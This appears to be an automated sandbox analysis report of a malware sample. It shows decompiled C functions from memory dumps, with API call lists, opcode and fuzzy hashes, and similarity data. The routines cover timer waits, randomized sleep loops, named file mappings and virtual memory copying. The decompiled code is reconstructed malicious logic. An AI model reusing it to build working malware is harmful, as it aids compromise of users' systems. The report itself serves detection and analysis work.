                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                                                                    • String ID: va\x
                                                                                                                                                                                                                                                                                    • API String ID: 2871901346-1859480093
                                                                                                                                                                                                                                                                                    • Opcode ID: d70199d8e10a2d2e95250175f7a506df011e43e39fe0c0ef7cba6a7f1569113e
                                                                                                                                                                                                                                                                                    • Instruction ID: 27aa421940a59852397b7d35bf91fe29b552a186387aa12b1cc740a83d645b07
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d70199d8e10a2d2e95250175f7a506df011e43e39fe0c0ef7cba6a7f1569113e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDA13871500219AFDB11DFA8DC89EAE3BA9FF98350F14C425F80DD7261DB319992CBA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182968404.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ChangeFindFirstNotification$IconLoad
                                                                                                                                                                                                                                                                                    • String ID: n$8n$8n$8n$Hn$Xn$Xn
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E00A71B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				struct %anon52 _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                                                    				void _v88;
                                                                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                                                                    				struct %anon52 _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                                                                    				long _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				struct %anon52 _t61;
                                                                                                                                                                                                                                                                                    				long _t65;
                                                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                                                                    				void** _t78;
                                                                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t74 = __edx;
                                                                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                                                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                                                                    				_v44 = _t46;
                                                                                                                                                                                                                                                                                    				if(_t46 == 0) {
                                                                                                                                                                                                                                                                                    					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                                                                                                    					_push(0xff676980);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( *0xa7a298);
                                                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					L00A77F56();
                                                                                                                                                                                                                                                                                    					_v36.LowPart = _t46;
                                                                                                                                                                                                                                                                                    					_v32 = _t74;
                                                                                                                                                                                                                                                                                    					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					_t51 =  *0xa7a2c4; // 0x2d0
                                                                                                                                                                                                                                                                                    					_v40 = _t51;
                                                                                                                                                                                                                                                                                    					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_v8.LowPart = _t53;
                                                                                                                                                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                                                                    							 *0xa7a2a4 = 5;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t69 = E00A74A3C(_t74); // executed
                                                                                                                                                                                                                                                                                    							if(_t69 != 0) {
                                                                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0xa7a2b8 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t72 = _v12;
                                                                                                                                                                                                                                                                                    						_t58 = _t72 << 4;
                                                                                                                                                                                                                                                                                    						_t76 = _t80 + (_t72 << 4) - 0x54;
                                                                                                                                                                                                                                                                                    						_t73 = _t72 + 1;
                                                                                                                                                                                                                                                                                    						_v24 = _t72 + 1;
                                                                                                                                                                                                                                                                                    						_t61 = E00A7243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                                                                                                                                                                                                                                                                                    						_v8.LowPart = _t61;
                                                                                                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t66 = _v24;
                                                                                                                                                                                                                                                                                    						_t90 = _t66 - 3;
                                                                                                                                                                                                                                                                                    						_v12 = _t66;
                                                                                                                                                                                                                                                                                    						if(_t66 != 3) {
                                                                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8.LowPart = E00A77289(_t73, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                                                    						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xa7a29c);
							goto L21;
						} else {
							__eflags =  *0xa7a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00A72813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xa7a2a0);
								L21:
								L00A77F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xa7a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

                                                                                                                                                                                                                                                                                    0x00a71ca0
                                                                                                                                                                                                                                                                                    0x00a71ca0
                                                                                                                                                                                                                                                                                    0x00a71ca8
                                                                                                                                                                                                                                                                                    0x00a71cb3
                                                                                                                                                                                                                                                                                    0x00a71cb6
                                                                                                                                                                                                                                                                                    0x00a71cc1
                                                                                                                                                                                                                                                                                    0x00a71cc3
                                                                                                                                                                                                                                                                                    0x00a71cc5
                                                                                                                                                                                                                                                                                    0x00a71cc8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a71cce
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a71cce
                                                                                                                                                                                                                                                                                    0x00a71cc8
                                                                                                                                                                                                                                                                                    0x00a71c7b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a71c73
                                                                                                                                                                                                                                                                                    0x00a71c43
                                                                                                                                                                                                                                                                                    0x00a71c45
                                                                                                                                                                                                                                                                                    0x00a71c48
                                                                                                                                                                                                                                                                                    0x00a71c49
                                                                                                                                                                                                                                                                                    0x00a71c49
                                                                                                                                                                                                                                                                                    0x00a71c4d
                                                                                                                                                                                                                                                                                    0x00a71c57
                                                                                                                                                                                                                                                                                    0x00a71c57
                                                                                                                                                                                                                                                                                    0x00a71c5d
                                                                                                                                                                                                                                                                                    0x00a71c60
                                                                                                                                                                                                                                                                                    0x00a71c60
                                                                                                                                                                                                                                                                                    0x00a71c66
                                                                                                                                                                                                                                                                                    0x00a71c66
                                                                                                                                                                                                                                                                                    0x00a71ce3
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00A71B5C
                                                                                                                                                                                                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A71B68
                                                                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A71B8D
                                                                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A71BA9
                                                                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A71BC2
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 00A71C57
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A71C66
                                                                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A71CA0
                                                                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A72F7D), ref: 00A71CB6
                                                                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A71CC1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05569338,00000000,?,73BCF710,00000000,73BCF730), ref: 00A74A8B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05569370,?,00000000,30314549,00000014,004F0053,0556932C), ref: 00A74B28
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A71BD5), ref: 00A74B3A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A71CD3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3521023985-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f337bca36d45c3bca38a5a7a546f6371619706cc2b1d164a9290d334f9c92a68
                                                                                                                                                                                                                                                                                    • Instruction ID: 44b6528d71895fdb75e79be9ea10aa97843e5b682a79f4c52594ef1f87a3b186
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f337bca36d45c3bca38a5a7a546f6371619706cc2b1d164a9290d334f9c92a68
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB515B71905228AADB11DFD8DD44DEEBFBCEB49760F20C116F818A21A1D7719A85CBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E6E0517A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                                                                    				long _t27;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t21 = E6E05146C();
                                                                                                                                                                                                                                                                                    				_v52 = _t21;
                                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                                    					return _t21;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                                                    					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t45 = 9;
                                                                                                                                                                                                                                                                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                                                    					_t26 = E6E0515A3(0, _t54); // executed
                                                                                                                                                                                                                                                                                    					_v56 = _t26;
                                                                                                                                                                                                                                                                                    					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                                                    					_t21 = _v56;
                                                                                                                                                                                                                                                                                    				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t27 = E6E051C12(_t45); // executed
                                                                                                                                                                                                                                                                                    				_v52 = _t27;
                                                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                                                    					_t21 = _v52;
                                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t21 = GetLastError();
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_t56 = E6E051CA4(E6E0516EC,  &_v28);
                                                                                                                                                                                                                                                                                    					if(_t56 == 0) {
                                                                                                                                                                                                                                                                                    						_v56 = GetLastError();
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                                                    						_v56 = _t31;
                                                                                                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_t56);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(E6E051D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                                                    					 *0x6e0541b8 = 0;
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t44 = _v48;
                                                                                                                                                                                                                                                                                    				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                                                    				_t37 =  *_t57(_t44, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_t50 = _t37;
                                                                                                                                                                                                                                                                                    				if(_t50 == 0) {
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					 *0x6e0541b8 = _t44;
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                                                    				_t39 = E6E051C8F(_t50 + _t15);
                                                                                                                                                                                                                                                                                    				 *0x6e0541b8 = _t39;
                                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *_t57(_t44, _t39, _t50); // executed
                                                                                                                                                                                                                                                                                    					E6E05136A(_t44);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x6e051842
                                                                                                                                                                                                                                                                                    0x6e051864
                                                                                                                                                                                                                                                                                    0x6e051864
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051864
                                                                                                                                                                                                                                                                                    0x6e051844
                                                                                                                                                                                                                                                                                    0x6e051849
                                                                                                                                                                                                                                                                                    0x6e051850
                                                                                                                                                                                                                                                                                    0x6e051855
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051857
                                                                                                                                                                                                                                                                                    0x6e05185a
                                                                                                                                                                                                                                                                                    0x6e05185d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e05185d

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E05146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E05146C: GetVersion.KERNEL32 ref: 6E05148A
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E05146C: GetCurrentProcessId.KERNEL32 ref: 6E051499
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E05146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2
                                                                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6E0517CB
                                                                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 6E0517D1
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0515A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0515A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0515A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 6E0517F4
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE ref: 6E05183C
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE ref: 6E05185A
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E0516EC,?,00000000), ref: 6E05188C
                                                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E0518A0
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E0518A7
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(6E0516EC,?,00000000), ref: 6E0518AF
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E0518C2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
                                                                                                                                                                                                                                                                                    • Instruction ID: 73df094d14b09fda9497128790b28c4241294c38b37dfd2d5e6384718fc149a8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88316471804F11ABD760DFE58A48BAF77ECEF8A754B100E1AF465C2344E734C918CAA2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                    			E6E051979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                                                                                                    				L6E052210();
                                                                                                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                                                                    				_t15 =  *0x6e0541d0;
                                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e05505e);
                                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e055054);
                                                                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                                                                    				L6E05220A();
                                                                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t19 = CreateFileMappingW(0xffffffff, 0x6e0541c0, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                                                                    				_t34 = _t19;
                                                                                                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
                                                                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 6E0519C1
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E051A11
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A29
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A3A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
